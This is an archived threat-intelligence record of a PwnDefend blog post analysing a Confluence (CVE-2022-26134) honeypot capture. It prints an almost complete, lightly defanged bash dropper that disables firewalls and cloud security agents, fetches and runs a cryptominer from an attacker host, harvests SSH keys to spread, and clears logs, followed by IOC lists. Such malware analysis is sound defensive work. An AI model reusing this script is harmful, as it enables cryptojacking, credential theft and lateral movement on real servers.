{ "id": "ea9d31ee-5067-4a95-ab76-89d85b46e17a", "created_at": "2026-04-06T00:15:00.818089Z", "updated_at": "2026-04-10T03:34:59.811691Z", "deleted_at": null, "sha1_hash": "9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb", "title": "CVE-2022-26134 – Honeypot Payload Analysis Example – PwnDefend", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 298628, "plain_text": "CVE-2022-26134 – Honeypot Payload Analysis Example –\r\nPwnDefend\r\nArchived: 2026-04-05 18:16:04 UTC\r\nThreat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the\r\nglobe. This just dropped into one of the pots:\r\nHTTP Command Executes this:\r\ncurl http[:]//202.28.229.174/ap[.]sh?confcurl\r\nThis download the following (ap.sh)\r\n$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing\r\n$stealz.Content | Out-File ap.txt\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 1 of 10\n\nDownloading a sample using powershell invoke-webrequest (iwr or wget) using basic parsing\r\nI’ve defanged the urls:\r\n#!/bin/bash\r\n#microsoft\r\n#lkasdjfjasdflkajdsflkajsdflk;ajdsflk jalskdjf lkasjdf ;lkajsdflkajsdfl;kj asldfkj\r\n#ijinvuneufdjknflaskdfj ijdif idnfmikdnfkjsfkdjfi hif\r\nexport PATH=$PATH:/tmp:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/tmp:/dev/shm\r\ncc=\"hxxp[://]202[.]28[.]229[.]174\"\r\nCURL_DOWNLOAD_URL=\"hxxp[://]202[.]28[.]229[.]174/curl\"\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 2 of 10\n\nsys=$(date|md5sum|awk -v n=\"$(date +%s)\" '{print substr($1,1,n%7+6)}')\r\nif [ $(ps -fe|grep hezb |grep -v grep|wc -l) -eq 1 ];then\r\n exit;\r\nfi\r\npkill -9 -f rodolf\r\nfunction __curl() {\r\n read proto server path \u003c\u003c\u003c$(echo ${1//// })\r\n DOC=/${path// //}\r\n HOST=${server//:*}\r\n PORT=${server//*:}\r\n [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=82\r\n exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\r\n echo -en \"GET ${DOC} HTTP/1.0\\r\\nHost: ${HOST}\\r\\n\\r\\n\" \u003e\u00263\r\n (while read line; do\r\n [[ \"$line\" == $'\\r' ]] \u0026\u0026 break\r\n done \u0026\u0026 cat) \u003c\u00263\r\n exec 3\u003e\u0026-\r\n}\r\nif [ -x \"$(command -v curl)\" ]; then\r\n WGET=\"curl -o\"\r\nelif [ -x \"$(command -v wget)\" ]; then\r\n WGET=\"wget -O\"\r\nelse\r\n PATH=\".:$PATH\"; curld -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e /usr/local/bin/.curld; chmod +x /usr/local/bin/.curl\r\n PATH=\".:$PATH\"; /usr/local/bin/.curld -V \u0026\u0026 WGET=\"/usr/local/bin/.curl -o\"\r\n PATH=\".:$PATH\"; /usr/local/bin/.curl -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e $HOME/.curld; chmod +x $HOME/.curld\r\n PATH=\".:$PATH\"; $HOME/.curld -V \u0026\u0026 WGET=\"$HOME/.curl -o\"\r\n PATH=\".:$PATH\"; $HOME/.curld -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e .curld; chmod +x .curld\r\n PATH=\".:$PATH\"; ./.curld -V \u0026\u0026 WGET=\"./.curld -o\"\r\n PATH=\".:$PATH\"; ./.curld -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e /var/tmp/.curld; chmod +x /var/tmp/.curld\r\n PATH=\".:$PATH\"; /var/tmp/.curld -V \u0026\u0026 WGET=\"/var/tmp/.curld -o\"\r\nfi\r\necho \"wget is $WGET\"\r\nget() {\r\n $WGET $2 $1\r\n chmod +x $2\r\n}\r\nufw disable\r\niptables -P INPUT ACCEPT\r\niptables -P OUTPUT ACCEPT\r\niptables -P FORWARD ACCEPT\r\niptables -F\r\nchattr -ia /etc/ld[.]so[.]preload\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 3 of 10\n\ncat /dev/null\u003e/etc/ld[.]so[.]preload\r\nf=false\r\nfindDir() {\r\n for i in $(ls $1 | grep -v proc); do\r\n if $f; then return; fi\r\n p=\"${1}\"\"/$i\"\r\n if [ -d $p -a -r $p ]; then\r\n if [ -w $p -a -x $p ]; then\r\n echo exit\u003e$p/i \u0026\u0026 chmod +x $p/i \u0026\u0026 cd $p \u0026\u0026 ./i \u0026\u0026 rm -f i \u0026\u0026 f=true \u0026\u0026 return\r\n fi\r\n findDir $p\r\n fi\r\n done\r\n}\r\nfindDir /\r\nrm -rf dom; rm -rf a[.]sh; rm -rf ko\r\ncrontab -r\r\ncrontab -l|sed '/\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python/d'|crontab -\r\ncat /proc/mounts|awk '{print $2}'|grep -P '/proc/\\d+'|grep -Po '\\d+'|xargs -I % kill -9 %\r\nps -ef | grep -v grep | grep confssh | awk '{print $2}' | xargs -i kill -9 {}\r\nps -ef | grep -v grep | grep rodolf | awk '{print $2}' | xargs -i kill -9 {}\r\nps -ef | grep -v grep | grep cruner | awk '{print $2}' | xargs -i kill -9 {}\r\nnetstat -antp | grep 125.39.100.42 | awk '{print $7}' | awk -F[/] '{print $1}' | xargs -i kill -9 {}\r\npkill -9 sidekiq\r\npkill -9 bashirc\r\npkill -9 -f bashirc\r\npkill -9 -f mysqldd\r\npkill -9 -f rodolf[.]sh\r\npkill -9 -f kinsing\r\npkill -9 -f rodolf\r\npkill -9 -f sshexec\r\npkill -9 -f cnrig\r\npkill -9 -f attack\r\npkill -9 -f dovecat\r\npkill -9 -f javae\r\npkill -9 -f donate\r\npkill -9 -f 'scan\\.log'\r\npkill -9 -f xmr-stak\r\npkill -9 -f crond64\r\npkill -9 -f stratum\r\npkill -9 -f /tmp/java\r\npkill -9 -f pastebin\r\npkill -9 -f '/tmp/\\.'\r\npkill -9 -f /tmp/system\r\npkill -9 -f excludefile\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 4 of 10\n\npkill -9 -f agettyd\r\npkill -9 -f /dev/shm\r\npkill -9 -f /var/tmp\r\npkill -9 -f '\\./python'\r\npkill -9 -f '\\./crun'\r\npkill -9 -f '\\./\\.'\r\npkill -9 -f '118/cf\\.sh'\r\npkill -9 -f /tmp/.UNIFI/.unifi[.]sh\r\npkill -9 '\\.6379'\r\npkill -9 'load\\.sh'\r\npkill -9 'init\\.sh'\r\npkill -9 'solr\\.sh'\r\npkill -9 '\\.rsyslogds'\r\npkill -9 pnscan\r\npkill -9 masscan\r\npkill -9 kthreaddi\r\npkill -9 -f -bash\r\npkill -9 kdevtmpfsi\r\npkill -9 solrd\r\npkill -9 meminitsrv\r\npkill -9 networkservice\r\npkill -9 sysupdate\r\npkill -9 phpguard\r\npkill -9 phpupdate\r\npkill -9 networkmanager\r\npkill -9 knthread\r\npkill -9 mysqlserver\r\npkill -9 watchbog\r\npkill -9 xmrig\r\npkill -9 bashirc\r\npkill -9 zgrab\r\nkillall -9 /tmp/*\r\nkillall -9 /var/tmp/*\r\nfor i in $(ls /proc|grep '[0-9]'); do\r\n if ls -al /proc/$i 2\u003e/dev/null|grep hezb 2\u003e/dev/null; then\r\n continue\r\n fi\r\n if grep -a 'donate-level=' /proc/$i/exe 1\u003e/dev/null 2\u003e\u00261; then\r\n kill -9 $i\r\n fi\r\n if ls -al /proc/$i | grep exe | grep \"/var/tmp\\|/tmp\"; then\r\n kill -9 $i\r\n fi\r\ndone\r\nif [ $(id -u) -eq 0 ]; then\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 5 of 10\n\nif ps aux|grep -i \"[a]liyun\"; then\r\n curl hxxp[://]update[.]aegis[.]aliyun[.]com/download/uninstall[.]sh|bash\r\n curl hxxp[://]update[.]aegis[.]aliyun[.]com/download/quartz_uninstall[.]sh|bash\r\n pkill aliyun-service\r\n rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis*\r\n systemctl stop aliyun[.]service\r\n systemctl disable aliyun[.]service\r\n service bcm-agent stop\r\n yum remove bcm-agent -y\r\n apt-get remove bcm-agent -y\r\n elif ps aux|grep -i \"[y]unjing\"; then\r\n /usr/local/qcloud/stargate/admin/uninstall[.]sh\r\n /usr/local/qcloud/YunJing/uninst[.]sh\r\n /usr/local/qcloud/monitor/barad/admin/uninstall[.]sh\r\n fi\r\nfi\r\na=$(nproc | grep -v nproc)\r\nb=4\r\nif [ \"$a\" -gt \"$b\" ]; then\r\n miner=\"-o 106.251.252.226:4545 -u $HOSTNAME.8\"\r\nelse\r\n miner=\"-o 106.251.252.226:4545 -u $HOSTNAME.4\"\r\nfi\r\nps -fe|grep hezb|grep -v grep; if [ $? -ne 0 ]; then\r\n md5=\"27c44dd2edc626df03504ce129f5c021\"\r\n sum=$(md5sum hezb | awk '{ print $1 }')\r\n if [ \"$md5\" = \"$sum\" ]; then\r\n chmod +x hezb; nohup hezb $miner -k -B 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n PATH=\".:$PATH\"; get $cc/ap[.]txt $sys; nohup $sys 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n else\r\n PATH=\".:$PATH\"; get $cc/ap[.]txt $sys; nohup $sys 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n PATH=\".:$PATH\"; get $cc/sys.$(uname -m) hezb; chmod +x hezb; nohup hezb $miner -k -B 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n fi\r\nfi\r\nrm -rf /tmp/.UNIFI /tmp/.destiny/*\r\nrm -rf /var/tmp/* /var/tmp/.* /tmp/* /var/.httpd $sys dlr\r\nchmod -rwx /tmp/.destiny/* /tmp/destiny\r\nKEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*'|grep -vw pub)\r\nKEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep IdentityFile|awk -F \"IdentityFile\" '{print\r\nKEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem'|uniq)\r\nHOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep HostName|awk -F \"HostName\" '{print $2}')\r\nHOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history|grep -E \"(ssh|scp)\"|grep -oP \"([0-9]{1,3}\r\nHOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts|grep -oP \"([0-9]{1,3}\\.){3}[0-\r\nUSERZ=$(\r\n echo root\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 6 of 10\n\nfind ~/ /root /home -maxdepth 2 -name '\\.ssh'|uniq|xargs find|awk '/id_rsa/'|awk -F'/' '{print $3}'|uniq|gre\r\n)\r\nusers=$(echo $USERZ|tr ' ' '\\n'|nl|sort -u -k2|sort -n|cut -f2-)\r\nhosts=$(echo \"$HOSTS $HOSTS2 $HOSTS3\"|grep -vw 127.0.0.1|tr ' ' '\\n'|nl|sort -u -k2|sort -n|cut -f2-)\r\nkeys=$(echo \"$KEYS $KEYS2 $KEYS3\"|tr ' ' '\\n'|nl|sort -u -k2|sort -n|cut -f2-)\r\nfor user in $users; do\r\n for host in $hosts; do\r\n for key in $keys; do\r\n chmod +r $key; chmod 400 $key\r\n ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host \"(curl $cc/ldr\r\n done\r\n done\r\ndone\r\npkill -9 kik\r\n#PATH=\".:$PATH\"; get $cc/f \"kik\"; nohup \"kik\" 1\u003e/dev/null 2\u003e\u00261 \u0026\r\necho 0\u003e/var/spool/mail/root\r\necho 0\u003e/var/log/wtmp\r\necho 0\u003e/var/log/secure\r\necho 0\u003e/var/log/cron\r\nI’ve not got time to look at this now but it might make an interesting excerise for someone to anlalyse in detail!\r\nA good to do this is GCHQ CyberChef: https://gchq.github.io/CyberChef/\r\nTry it out: SAMPLE\r\nIOCs and Analysis Info\r\nExtracted IPs:\r\n202.28.229.174\r\n202.28.229.174\r\n125.39.100.42\r\n106.251.252.226\r\n106.251.252.226\r\n127.0.0.1\r\nExtracted urls:\r\nhxxp[://]202[.]28[.]229[.]174\r\nhxxp[://]202[.]28[.]229[.]174/curl\r\nhxxp[://]update[.]aegis[.]aliyun[.]com/download/uninstall[.]sh|bash\r\nhxxp[://]update[.]aegis[.]aliyun[.]com/download/quartz_uninstall[.]sh|bash\r\nExtracted file paths:\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 7 of 10\n\n/bin/bash\r\n/tmp\r\n/bin\r\n/sbin\r\n/usr/bin\r\n/usr/sbin\r\n/usr/local/bin\r\n/usr/local/sbin\r\n/tmp\r\n/dev/shm\r\n/202.28.229.174\r\n/202.28.229.174/curl\r\n/dev/tcp\r\n/1.0\r\n/usr/local/bin/.curld\r\n/usr/local/bin/.curld\r\n/usr/local/bin/.curld\r\n/usr/local/bin/.curl\r\n/usr/local/bin/.curl\r\n/.curld\r\n/.curld\r\n/.curld\r\n/.curl\r\n/.curld\r\n/.curld\r\n/.curld\r\n/.curld\r\n/var/tmp/.curld\r\n/var/tmp/.curld\r\n/var/tmp/.curld\r\n/var/tmp/.curld\r\n/etc/ld.so.preload\r\n/dev/null\r\n/etc/ld.so.preload\r\n/i\r\n/i\r\n/i\r\n/d\r\n/proc/mounts\r\n/proc\r\n/tmp/java\r\n/tmp\r\n/tmp/system\r\n/dev/shm\r\n/var/tmp\r\n/python\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 8 of 10\n\n/crun\r\n/cf\r\n/tmp/.UNIFI/.unifi.sh\r\n/tmp\r\n/var/tmp\r\n/proc\r\n/proc\r\n/dev/null\r\n/dev/null\r\n/proc\r\n/exe\r\n/dev/null\r\n/proc\r\n/var/tmp\r\n/tmp\r\n/update.aegis.aliyun.com/download/uninstall.sh\r\n/update.aegis.aliyun.com/download/quartz\r\n/etc/init.d/agentwatch\r\n/usr/sbin/aliyun-service\r\n/usr/local/aegis\r\n/usr/local/qcloud/stargate/admin/uninstall.sh\r\n/usr/local/qcloud/YunJing/uninst.sh\r\n/usr/local/qcloud/monitor/barad/admin/uninstall.sh\r\n/dev/null\r\n/ap.txt\r\n/dev/null\r\n/ap.txt\r\n/dev/null\r\n/sys.\r\n/dev/null\r\n/tmp/.UNIFI\r\n/tmp/.destiny\r\n/var/tmp\r\n/var/tmp/.\r\n/tmp\r\n/var/.httpd\r\n/tmp/.destiny\r\n/tmp/destiny\r\n/root\r\n/home\r\n/.ssh/config\r\n/home\r\n/.ssh/config\r\n/root/.ssh/config\r\n/root\r\n/home\r\n/.ssh/config\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 9 of 10\n\n/home\r\n/.ssh/config\r\n/root/.ssh/config\r\n/.bash\r\n/home\r\n/.bash\r\n/root/.bash\r\n/.ssh/known\r\n/home\r\n/.ssh/known\r\n/root/.ssh/known\r\n/root\r\n/home\r\n/id\r\n/ldr.sh\r\n/ldr.sh\r\n/ldr.sh\r\n/f\r\n/dev/null\r\n/var/spool/mail/root\r\n/var/log/wtmp\r\n/var/log/secure\r\n/var/log/cron\r\nSource: https://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/" ], "report_names": [ "cve-2022-26134-honeypot-payload-analysis-example" ], "threat_actors": [ { "id": "5d2bd376-fcdc-4c6a-bc2c-17ebbb5b81a4", "created_at": "2022-10-25T16:07:23.667223Z", "updated_at": "2026-04-10T02:00:04.705778Z", "deleted_at": null, "main_name": "GCHQ", "aliases": [ "Government Communications Headquarters", "Operation Socialist" ], "source_name": "ETDA:GCHQ", "tools": [ "Prax", "Regin", "WarriorPride" ], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "0409120f-2b1f-4edd-a696-75d312eb2890", "created_at": "2023-01-06T13:46:39.463928Z", "updated_at": "2026-04-10T02:00:03.337809Z", "deleted_at": null, "main_name": "Hezb", "aliases": [ "Mimo" ], "source_name": "MISPGALAXY:Hezb", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-10T02:00:03.311299Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434500, "ts_updated_at": 1775792099, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb.pdf", "text": "https://archive.orkl.eu/9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb.txt", "img": "https://archive.orkl.eu/9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb.jpg" } }